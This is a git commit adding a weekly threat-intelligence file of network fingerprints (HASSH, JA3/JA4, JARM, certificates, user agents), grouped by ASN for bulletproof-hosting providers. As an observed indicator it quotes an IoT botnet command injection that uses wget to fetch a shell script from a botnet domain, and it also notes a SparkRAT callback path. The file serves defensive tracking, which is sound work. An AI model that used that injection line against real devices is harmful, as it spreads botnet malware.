From 805ce54d6b181cdaab453e7e50cfac14cc371b6a Mon Sep 17 00:00:00 2001 From: hrbrmstr Date: Mon, 20 Jul 2026 07:23:29 -0400 Subject: chore: weekly asn update --- kevlar/2026-07-20/iocs/fingerprints.txt | 59 +++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 kevlar/2026-07-20/iocs/fingerprints.txt (limited to 'kevlar/2026-07-20/iocs/fingerprints.txt') diff --git a/kevlar/2026-07-20/iocs/fingerprints.txt b/kevlar/2026-07-20/iocs/fingerprints.txt new file mode 100644 index 0000000..8b5b84a --- /dev/null +++ b/kevlar/2026-07-20/iocs/fingerprints.txt @@ -0,0 +1,59 @@ +# Weekly BP Report -- 2026-07-20 +# Fingerprints observed per ASN +# Query range: 2026-07-13 through 2026-07-20 + +# ============= HASSH Client Fingerprints ============= + +# AS57043 - Hostkey B.v. - IoT botnet download callback (NO SSH HASSH collected -- HTTP only) +AS57043,132.243.194.215,ja4h,ge11nn0400_777e992b8532,,IoT MIPS downloader GET /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh on port 6001 + +# AS51396 - Pfcloud - dominant scan cluster (no live SSH probed - 204.76.203.18 census HASSH) +AS51396,204.76.203.18,hassh-server,425d29fe50d8e4f5e37efb6e24bcf660,SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u7,Coordinated scan cluster leader; 13,766 Sponge sessions +AS51396,204.76.203.18,ja4tscan-65160_MTU,42340_2-1-1-4-1-3_1460_10_1-2,,Distinctive MTU 42340 (NOT default Ubuntu 65160) -- custom tuning (smaller MSS) + +# AS51852 - Private Layer INC - OpenSSH 8.9p1 Ubuntu-3ubuntu0.15 (same HASSH as AS209847/FORTIS) +AS51852,81.17.28.130,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.15,PLI-AS new primary IP for week; OpenSSH_8.9p1 with Ubuntu-3 patch level .15 (vs .16 in FORTIS/KPRONET) + +# AS200651 - FlokiNet Tor exit - OpenSSH 10.2p1 (UPGRADED from last week's OpenSSH 10.1) +AS200651,185.100.87.136,hassh-client,e54ef3ec27fe1fea7ab64d3fa05359fd,SSH-2.0-OpenSSH_10.2p1,SSH-10.x series shares HASSH; banner string subtly updated +AS200651,185.100.87.136,hassh-server,b1bff636ebbdbaa9dd2ad97fd173c956,SSH-2.0-OpenSSH_9.9,Alt-SSH server on port 7288 (not 22) +AS200651,185.100.87.136,jarm,2ad2ad16d2ad2ad00042d42d000000332dc9cd7d90589195193c8bb05d84fa,,Tor 0.4.9.11 default 9001 listener jarm + +# AS400992 - ZhouyiSat - now testing against Windows admin ports (no SSH/TLS fingerprints collected) + +# AS14956 - RouterHosting LLC - OpenSSH 9.6p1 Ubuntu-3ubuntu13.18 (NOT vulnerable to regreSSHion) + Werkzeug fofa_monitor panel +AS14956,216.126.239.17,hassh-server,e42184b06d45385a906f0803d04c83da,SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.18,Patched against regreSSHion +AS14956,216.126.239.17,fofa-monitor-realm,Basic realm=\"fofa_monitor\",Werkzeug/3.1.8 Python/3.12.3,Censys flagged CENSYS-2022-1002 Unencrypted HTTP Weak Auth on port 5000 -- a fofa-search-style monitoring panel + +# AS214940 - Kprohost LLC - OpenSSH 8.9p1 Ubuntu-3ubuntu0.16 (same HASSH as AS209847/FORTIS, AS51852/PLI) +AS214940,77.83.39.119,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16,Uniform Ubuntu 22 LTS provisioning across BP providers + +# AS211720 - Datashield - self-signed cert with hostname prohaska.beatty.biz +AS211720,185.231.33.46,jarm,07d19d12d21d21d07c42d43d000000f50d155305214cf247147c43c0f1a823,,Distinctive TLS 1.0/1.1 still enabled +AS211720,185.231.33.46,cert-self-signed,"CN=prohaska.beatty.biz; C=US; ST=HI; O=Prohaska-Beatty; OU=compress; emailAddress=compress@prohaska.beatty.biz",Validity 2022-08-16 -> 2029-08-14 (7 years),Static long-lived fake US business entity cert + +# AS198953 - Proton66 OOO - GreyNoise suspicious multi-protocol brute +AS198953,176.120.22.16,greynoise,suspicious,"tags: MySQL Protocol, TLS Crawler, Python requests client, Generic Suspicious Linux Command",Proton66 top IP this week (replaced 176.120.22.240) + +# AS209847 ("Sponge tag") / Real AS = AS41745 (FORTIS-AS Baykov Ilya Sergeevich RU) +AS209847-real-41745,45.144.28.70,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16,Same Ubuntu 22 LTS HASSH across multiple bulletproof providers. Known CVEs include CVE-2024-6387 regreSSHion (KEV), CVE-2025-26465, CVE-2023-38408 (KEV), CVE-2026-35385 (HIGH) + +# ============= JA4 / JA3 TLS Fingerprints ============= + +# AS200651 - Stable across prior week (Tor 1.3_d1_d2 client) +AS200651,185.100.87.136,ja4,t13i1909h2_9dc949149365_97f8aa674fd9,TLSv1.3,Stable TLS 1.3 Chrome-with-Tor-pattern fingerprint +AS200651,185.100.87.136,ja3,7c1e207beb00684bbbe144f1b0abe1d5,TLSv1.3,Stable +AS200651,185.100.87.136,ja4h-get,ge11nn0400_88d30a62b7ad,GET /eventmanager HTTP/1.1,GET /eventmanager on port 443 (eventmanager path new this week) +AS200651,185.100.87.136,ja4h-post-spark,po11nn0600_c9506d37ac14,POST /api/client/update?arch=amd64&commit=08059e95...&os=windows,SPARKRAT callback with octet-stream binary body + secret header + +# AS30823 - new entrant with same JA4-base as AS200651 Tor (but different full JA4 due to cipher list composition) +AS30823,41.216.188.21,ja4,t13i190800_9dc949149365_97f8aa674fd9,TLSv1.3,Same JA4-y-binning base "9dc949149365_97f8aa674fd9" as Tor exit (different i-form 190800 vs 190900 means narrower cipher suite) +AS30823,41.216.188.21,ja3,19e29534fd49dd27d09234e639c4057e,TLSv1.3,Distinct JA3 RSA-only fingerprint from a benign mobile Android 9 source (Redmi G8141) +AS30823,41.216.188.21,ja4h,ge11nn0500_9af7e0472034,GET / HTTP/1.1,Android 9 G8141 Chrome 76 mobile UA -- likely benign single connection + +# AS51396 - Pfcloud's new scanner fingerprints: +AS51396,various,ua,Go-http-client/1.1,3 IPs,Go-lang default HTTP client scanner +AS51396,various,ua,Mozilla/5.0 zgrab/0.x,3 IPs,ZGrab academic scanner +AS51396,various,ua,odin-scanner/0.4,1 IP (38 events),NEW THIS WEEK -- brand-new custom tooling on Pfcloud farm +AS51396,various,ua,Hello World,1 IP (12 events),Distinctive minimalistic UA +AS51396,various,ua,Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36,1 IP (51 events),Chrome 149 spoofing from within Pfcloud infra \ No newline at end of file -- cgit v1.2.3